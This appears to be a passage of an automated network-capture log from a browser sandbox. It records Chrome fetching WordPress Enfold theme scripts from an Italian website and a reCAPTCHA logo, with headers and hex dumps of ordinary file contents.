                                                                                                                                              2025-01-03 16:33:04 UTC784INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 41 56 49 41 20 49 6d 61 67 65 20 48 6f 74 73 70 6f 74 73 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 09 24 2e 66 6e 2e 61 76 69
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// AVIA Image Hotspots// -------------------------------------------------------------------------------------------(function($){ "use strict";$.fn.avi


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              103192.168.2.164982989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:04 UTC493OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdown/countdown.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:04 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:04 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 2939
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:04 UTC2939INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 0a 2f 2f 20 41 56 49 41 20 43 6f 75 6e 74 64 6f 77 6e 0a 2f 2f 20 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 76 61 72 20 5f
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// // AVIA Countdown// // -------------------------------------------------------------------------------------------(function($){ "use strict";var _


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              104192.168.2.1649832142.250.186.1644436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:04 UTC475OUTGET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1
                                                                                                                                              Host: www.google.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:04 UTC777INHTTP/1.1 200 OK
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/recaptcha
                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="recaptcha"
                                                                                                                                              Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                              Content-Length: 18160
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Server: sffe
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              Date: Fri, 03 Jan 2025 16:24:23 GMT
                                                                                                                                              Expires: Fri, 03 Jan 2025 17:14:23 GMT
                                                                                                                                              Cache-Control: public, max-age=3000
                                                                                                                                              Age: 521
                                                                                                                                              Last-Modified: Wed, 29 Jul 2020 17:15:00 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close
                                                                                                                                              2025-01-03 16:33:04 UTC613INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 98 00 00 01 d0 08 06 00 00 00 9c 30 7c 54 00 00 46 b7 49 44 41 54 78 da ec 9d 5b 6c 5c 47 19 c7 47 71 5b 01 6a cb 03 2d a8 d9 99 b3 be a4 b5 89 51 aa 62 89 e4 cc cc 3a de 3d 9b 4b 9b 36 40 23 4b 50 de 00 55 08 21 28 42 26 21 e5 c1 69 bc 17 97 ab a0 8a 6a 10 42 bd 24 3e 67 f6 ec da 25 14 28 0d 75 02 0f 48 08 54 a4 92 aa e4 a1 94 92 50 35 71 13 db bb 67 77 bd 89 bd cc d9 d8 84 48 ae 62 3b de 62 ef f9 ff a4 bf 66 bd 96 fc 64 9d 9f e6 fb be 33 43 00 00 00 00 b0 42 f4 f7 57 d7 59 df cd 6f 8c a7 bc 87 63 e9 d2 3e 6b a0 f0 4d 24 78 89 0e 4c ec df fa e8 78 22 f2 ad 7f ff 40 f6 9d 3e c4 fb 4e ff 5c c7 16 7d 6f 3e 27 fa ce fc 5a ec 3d f3 62 64 ef 5b 63 91 fd 67 8f 77 ec 39 7e 94 f2 e1 0c 13 ea b0 21 9d a7 0c
                                                                                                                                              Data Ascii: PNGIHDR0|TFIDATx[l\GGq[j-Qb:=K6@#KPU!(B&!ijB$>g%(uHTP5qgwHb;bfd3CBWYoc>kM$xLx"@>N\}o>'Z=bd[cgw9~!
                                                                                                                                              2025-01-03 16:33:04 UTC1390INData Raw: 32 d3 dd d1 12 55 ed d4 54 ef 27 00 80 d5 df 8f f1 25 63 f9 92 49 43 32 c8 bb 08 e6 c1 13 57 04 53 f7 a8 ab 76 3f ec bf e2 c9 4d 50 91 7b 5b 7f f7 37 26 ec 17 b4 74 9e 08 0b f5 85 70 c4 fe f8 86 88 ba 9d 00 00 56 e3 4e 46 35 f5 a4 4a cd ba 16 ff 1d 2b 35 3d 6e 25 bd c0 3f 54 91 b9 24 97 2e 98 fa 8b 47 4b 87 bb 15 26 b3 05 2d 9e f3 fa bb 33 3a 27 28 b7 87 18 b7 bf dc 12 cd dd 7d 9b f8 d9 2d 04 00 b0 7a 76 32 b1 83 13 6d b1 54 e1 fb 56 aa 52 84 64 90 5a 92 de 0a 08 a6 fe e2 61 7e 8f 47 8e 78 7a bd 10 e2 ea 4d fd fd 4b 54 b8 07 98 50 bb 9b b7 0c 37 13 00 c0 ea e8 c9 58 e9 e2 68 3c 7d d1 83 64 90 9a 60 0e 4e 55 3b 3e 7d 7c 5e 30 6b 23 22 53 31 e4 c8 94 5e cf 69 d1 bc c2 b8 33 4c fd 72 9a 39 7c 4f 73 cf d8 fb 08 00 e0 ff 53 2e 8b 3e 56 b9 3b fe 78 79 34 9e 82
                                                                                                                                              Data Ascii: 2UT'%cIC2WSv?MP{[7&tpVNF5J+5=n%?T$.GK&-3:'(}-zv2mTVRdZa~GxzMKTP7Xh<}d`NU;>}|^0k#"S1^i3Lr9|OsS.>V;xy4
                                                                                                                                              2025-01-03 16:33:04 UTC1390INData Raw: c7 eb a1 05 b5 50 2f 22 24 33 bb c9 f6 66 11 c1 1e da 9d d9 6d b3 ef 4d a3 a9 88 62 0d 68 11 73 2b ea ad 08 4a f1 90 25 ec bc 97 58 4f 95 1e 8a 27 2d 68 f6 cd 26 22 82 7f ea 41 14 a4 28 f1 4f 63 d3 d2 7a 10 5b 28 36 91 98 ec ee bc 9d cd a6 19 67 77 b3 61 b5 08 ad 79 49 76 77 be 1f f8 5e e7 f8 3e bc f9 fe de 7b c8 5d 24 62 4e 96 75 23 7b 3e 7a 50 c4 db fa b7 58 b0 73 e9 8e 8b cb 0d b9 40 30 40 a9 64 68 26 3f 44 79 e9 37 82 5d 4c 8b 0a e6 b3 d0 2f e6 2d 9b e4 c4 b2 66 e4 ae 44 8d ec 91 76 94 4b 57 fc ac a1 19 ce 74 a3 73 81 60 80 32 06 d3 33 3b fa 32 c5 21 62 97 7e 21 4c 56 42 bf a0 b7 a8 60 62 10 4c 6b c7 74 aa bd cc 5c 4f d2 39 a1 c5 c5 bd 6d d3 b9 90 da ce e5 92 b6 ba 73 81 60 80 42 b9 f8 3b a9 5d 3c 61 71 ef 77 ca dd 95 d0 2f e6 10 0c b2 9e 98 a2 fa cb
                                                                                                                                              Data Ascii: P/"$3fmMbhs+J%XO'-h&"A(Ocz[(6gwayIvw^>{]$bNu#{>zPXs@0@dh&?Dy7]L/-fDvKWts`23;2!b~!LVB`bLkt\O9ms`B;]<aqw/
                                                                                                                                              2025-01-03 16:33:04 UTC1390INData Raw: 40 08 11 51 54 b5 bc 20 a8 2a fa 00 02 2a f5 01 26 b1 cf 99 49 82 80 52 2e 02 a9 05 71 49 76 67 d7 01 04 08 68 41 a8 20 48 69 10 f0 82 40 50 89 a2 f0 40 44 c1 8e e7 ba 8e ed e9 99 43 56 aa 2a 23 bc f6 da 3b 76 fe 3f e9 af 5d c9 6f 5e ef f9 f9 fb be 73 ce b4 4a d6 1a 1b f0 af d9 e0 36 3e 64 6e 82 05 15 99 4a 30 a8 60 10 08 06 b4 0e 13 fe 6a ea c4 bb 98 88 27 a8 08 b0 a0 22 53 b5 c8 50 c1 20 10 0c 68 8d b2 9d 9e 40 79 f0 7b ca a3 af a5 64 b0 98 22 68 91 21 10 0c 68 0f 4c 84 9b a9 93 bc c7 1c b4 c6 10 08 06 81 60 40 9b a0 83 f1 0a 4b 84 8f 51 11 1d c2 75 30 08 04 83 40 30 a0 2d 6c 7a e0 b3 63 ca 83 fe 6f 98 93 7c c1 d0 1a 43 20 18 04 82 01 ed 82 39 e1 c5 54 24 2f 61 ee 82 40 30 08 04 03 da 38 d8 1f 3e 85 89 70 2b 13 c9 41 9c 79 41 a6 2b 98 73 af 78 35 25 c5
                                                                                                                                              Data Ascii: @QT **&IR.qIvghA Hi@P@DCV*#;v?]o^sJ6>dnJ0`j'"SP h@y{d"h!hL`@KQu0@0-lzco|C 9T$/a@08>p+AyA+sx5%
                                                                                                                                              2025-01-03 16:33:04 UTC1390INData Raw: 76 59 5e 04 43 07 46 a8 12 cc 22 20 7b f4 73 b6 cb 0c 5b 99 21 18 30 0d 2e 77 e2 95 59 0b 86 89 70 02 5b 93 3b 1c 11 1e 96 4b f2 26 e5 e1 45 5b bc 96 17 65 d5 2e a3 4e fc 76 53 32 39 98 c1 48 c1 f8 8b 45 30 4d c9 1c 47 f4 ea 63 78 c0 19 04 03 7e 00 53 8c 5e 65 39 c9 fb 18 ee 77 5e 2e 6a e6 c2 a3 ba 65 27 67 17 6c bb ab 30 23 9a 33 99 b8 39 93 e9 74 05 13 98 5b 47 98 12 cc 22 62 6d b6 95 d9 a8 ed 94 99 84 64 20 18 30 05 e5 87 d2 13 28 f7 ef 66 3c c2 70 bf 93 11 91 8a 29 82 3f 96 ed d1 d3 0b b3 47 b5 cb 4c 1e be 65 b9 87 d4 4c a6 a3 82 e1 81 12 cc 62 dc 7d 49 8a 95 3b 88 51 1b c7 36 66 08 06 fc 1f 8c 07 6b 2c 11 0d 51 07 cf db ef e4 7f f9 b2 d2 98 90 ef ef 2f db c3 a7 b4 f5 f3 bd 47 49 a6 39 93 81 60 e6 08 4d af dc a6 19 f5 31 9c fc 87 60 c0 61 d2 34 5d 42
                                                                                                                                              Data Ascii: vY^CF" {s[!0.wYp[;K&E[e.NvS29HE0MGcx~S^e9w^.je'gl0#39t[G"bmd 0(f<p)?GLeLb}I;Q6fk,Q/GI9`M1`a4]B
                                                                                                                                              2025-01-03 16:33:04 UTC1390INData Raw: 49 5d 97 1d a9 60 9a 46 0a 46 cb e5 1d 25 97 ca 0f dd 7d 90 0b 04 93 5e f4 10 1d f5 9a ef 63 b9 65 82 c1 3e 0f 6a d1 87 54 07 fb 29 c5 7e 3e 0a fe 03 9d c9 9c 8c 60 28 13 77 9b 26 98 ae 05 3a 73 d9 85 cc 05 82 49 3d c4 11 8b a9 d7 f8 02 82 49 ee 8d 17 ca e4 06 aa 1f 10 4b 37 77 3e df ce 64 5a 13 10 cc 24 72 e9 1b 46 e6 02 c1 98 b1 9e bf c0 c4 43 94 05 fb 21 98 24 aa 97 20 b4 59 50 25 83 ad 52 8f 9a 35 ca 18 00 8d 32 19 47 7c 79 5c c9 44 95 9d 16 4c c3 18 c1 64 73 95 59 c8 5c 20 18 63 b8 8b 87 17 13 b7 ee 10 2e 6b 68 51 4e 26 7b a1 4c 8e 50 16 5e 62 58 ae a7 24 53 d7 99 cc e4 82 91 4d e2 89 c5 5a 30 06 04 fa dd f9 ca 77 c8 5c 20 18 63 b8 7d b0 7a 3d 71 e5 3a ec 1f 8b fd b4 ff d0 ab d4 6d 14 75 f5 62 18 0b d7 2a c9 b8 62 3b f5 c6 5b 93 5c 91 8d 1f 11 4c 98
                                                                                                                                              Data Ascii: I]`FF%}^ce>jT)~>`(w&:sI=IK7w>dZ$rFC!$ YP%R52G|y\DLdsY\ c.khQN&{LP^bX$SMZ0w\ c}z=q:mub*b;[\L
                                                                                                                                              2025-01-03 16:33:04 UTC1390INData Raw: f8 88 e4 ca 6b 1b 67 6f ba f2 84 00 d0 73 81 08 98 4c 86 4a 39 45 a2 74 ed 88 28 21 60 cc b9 07 59 74 d0 53 d1 b7 c6 78 04 82 00 d2 b0 2c d6 98 67 41 cf 05 22 60 cc 41 f4 85 4b 45 5f ec 18 02 c6 a4 5b f4 57 84 7b c5 8a e8 b2 b2 1d 58 a2 9c 9e 4b 91 35 ea b9 04 11 2e 30 ae d5 c9 06 ac 0e f6 81 00 78 67 30 91 c5 14 2e 1d 58 a2 6c ce 23 92 29 ac 3b 45 5f 48 8c 3f f6 17 a4 57 b8 c4 7b 2e 08 17 38 6a 06 73 95 5e 37 09 80 37 60 fa 57 88 52 f8 37 04 8c 39 4b 94 45 29 f6 5d 49 65 78 a6 00 d2 2a 5c d0 73 81 e3 04 4c c8 e6 54 3f 11 00 6f c0 84 5f 15 bd d1 93 08 18 93 1a fc 52 74 27 95 c8 a6 0a 20 3d c2 a5 38 30 c7 52 20 ff 8a 70 81 e3 04 4c 38 cb a9 79 05 c0 07 0d 8a ab c8 53 08 98 54 8d e8 1e 6f f8 06 f9 a1 cb d7 ff 94 00 d2 20 5c d8 9c a9 76 f6 13 7a 2e f0 0e 01
                                                                                                                                              Data Ascii: kgosLJ9Et(!`YtSx,gA"`AKE_[W{XK5.0xg0.Xl#);E_H?W{.8js^77`WR79KE)]Iex*\sLT?o_Rt' =80R pL8ySTo \vz.
                                                                                                                                              2025-01-03 16:33:04 UTC1390INData Raw: b7 dd 21 e4 02 00 08 86 c4 9c b9 8c f9 3b 72 01 00 04 43 e2 c4 ed 34 e9 8c 0f 0e 0e b2 2c 06 00 08 86 c4 ad b9 38 c8 05 00 10 0c 89 26 17 6a 2e 00 80 60 48 f4 65 31 6a 2e 00 80 60 48 f4 99 0b 35 17 00 40 30 a4 34 72 61 e6 02 00 08 86 44 af b9 48 3a 8c 5c 20 90 65 d9 fc 04 00 c1 90 18 cf b9 b0 5b 0c a6 09 67 cc 59 30 db 3b 3a 3a 16 25 00 08 86 b0 15 19 62 d1 d7 d7 57 ef d3 1b c6 fd 2a 86 26 24 03 08 86 50 73 81 28 b4 b5 b5 2d 93 74 73 78 78 38 ec 28 9c 70 ff 38 c9 a9 d9 80 60 c8 1f d5 5c 24 3d f2 a9 c8 d4 5c e0 07 cd cd cd f3 dc 37 4e 85 ad ea df cf a0 2b 48 9a 70 1a 99 c9 00 82 21 bf 4c f8 df 53 73 81 62 a4 69 ba de e3 73 34 88 25 f4 95 19 92 79 e3 ef 27 98 c9 00 82 21 b9 91 34 15 17 70 cf 38 4b 13 80 ef 84 9b 0d f7 91 8b 33 e4 32 4b 32 1e b3 af 79 83 29
                                                                                                                                              Data Ascii: !;rC4,8&j.`He1j.`H5@04raDH:\ e[gY0;::%bW*&$Ps(-tsxx8(p8`\$=\7N+Hp!LSsbis4%y'!4p8K32K2y)
                                                                                                                                              2025-01-03 16:33:04 UTC1390INData Raw: 91 fd f2 9d 6b 59 ee f6 7a 3a bc bf 7c bb d5 63 7f 09 91 f9 c0 63 c5 5a 44 06 43 60 a0 e4 29 cd 3e 1e 77 1f e8 f5 40 7a 5f 5f 5f df f2 9e 9e 9e cb 33 19 84 c5 2c b3 97 b7 c5 ed 73 50 d2 29 b7 55 bd ff 28 09 91 19 71 3f 59 83 c8 60 08 0c 94 9c 9f c9 e7 13 26 24 ed 77 8e e1 09 7b 35 2b f3 93 01 ea 69 20 89 12 2f 8d 21 2c 16 da 47 25 bd 67 fe cc 4f 92 a8 fb 7e 52 10 19 49 c3 23 23 23 eb 10 19 0c 81 81 b9 78 34 53 3e 7e 22 69 bb 69 1d 1d 1d 5d 9a f7 6a 2e aa d5 bd 5a 62 ca b1 eb b8 35 d9 63 79 d2 9f 7d 50 d2 1f 08 4b d1 75 32 39 1f 87 c3 93 61 da 3b 86 c0 c0 5c a7 36 07 87 dd 37 de 70 1f 79 cc ac 8d 15 eb 31 fb 2c 06 96 1a d8 17 bf d1 9f e9 6a 49 77 f8 73 ef 8c 15 ec 92 72 f1 d9 f9 3e 94 24 32 43 ee 0f ab f1 64 30 04 06 e6 2c 34 81 a4 d3 ee 27 df 98 d7 25 6d
                                                                                                                                              Data Ascii: kYz:|ccZDC`)>w@z___3,sP)U(q?Y`&$w{5+i /!,G%gO~RI###x4S>~"ii]j.Zb5cy}PKu29a;\67py1,jIwsr>$2Cd0,4'%m
                                                                                                                                              2025-01-03 16:33:04 UTC1390INData Raw: e5 44 34 46 20 10 8c e6 ff 5e 06 f8 7b b6 b9 96 c5 ae 15 9f 35 76 59 c1 a1 d7 8b 82 0d cd 64 56 f7 63 fb 32 00 71 3b 73 b1 05 73 9e fb 9f 10 d1 38 81 40 30 ba e5 c2 1c e5 fe 0a b7 5c ae 9d 59 79 d6 b8 0f 0a 9b df 2d 32 ea 7f 97 2a 84 33 32 00 c4 a1 5c 78 59 fc 22 f7 f3 89 28 45 20 10 8c 07 72 f9 83 bf 5f 3a 11 4d 16 37 98 d4 cf ac 94 74 df c1 2c bf 51 7f 9c 54 15 24 03 40 7c cd 5c da b9 f5 0f 8f 7d 04 82 d1 5d 73 b1 e5 c2 fd 8c 91 fc 82 3d 99 dd 39 31 a3 e8 e0 ea 52 d9 70 5c aa ca 41 48 06 80 b8 98 b9 74 70 3f 10 0c 06 ef 17 08 04 e3 45 cd c5 96 4b 20 10 98 22 46 98 39 9f 76 dd b3 d2 df bc 76 9b b1 eb 94 54 38 ed 0f c0 28 97 4b 27 b7 c1 48 24 f2 80 40 20 18 0f 96 c5 6c b9 ac 70 e4 a2 23 4f e7 74 df 9b e9 fb 65 3d 4b e6 0c 99 21 cc 64 00 18 85 72 61 ba 4d
                                                                                                                                              Data Ascii: D4F ^{5vYdVc2q;ss8@0\Yy-2*32\xY"(E r_:M7t,QT$@|\}]s=91Rp\AHtp?EK "F9vvT8(K'H$@ lp#Ote=K!draM


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              105192.168.2.164983389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:04 UTC672OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:05 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 1782
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:05 UTC1782INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 0a 2f 2f 20 41 56 49 41 20 4d 61 67 61 7a 69 6e 65 20 66 75 6e 63 74 69 6f 6e 20 66 6f 72 20 6d 61 67 61 7a 69 6e 65 20 73 6f 72 74 69 6e 67 0a 2f 2f 20 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// // AVIA Magazine function for magazine sorting// // -------------------------------------------------------------------------------------------(function(


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              106192.168.2.164983489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:04 UTC493OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:05 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:05 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 31458
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:05 UTC16107INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 41 76 69 61 20 53 6c 69 64 65 73 68 6f 77 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Avia Slideshow======================================================================================
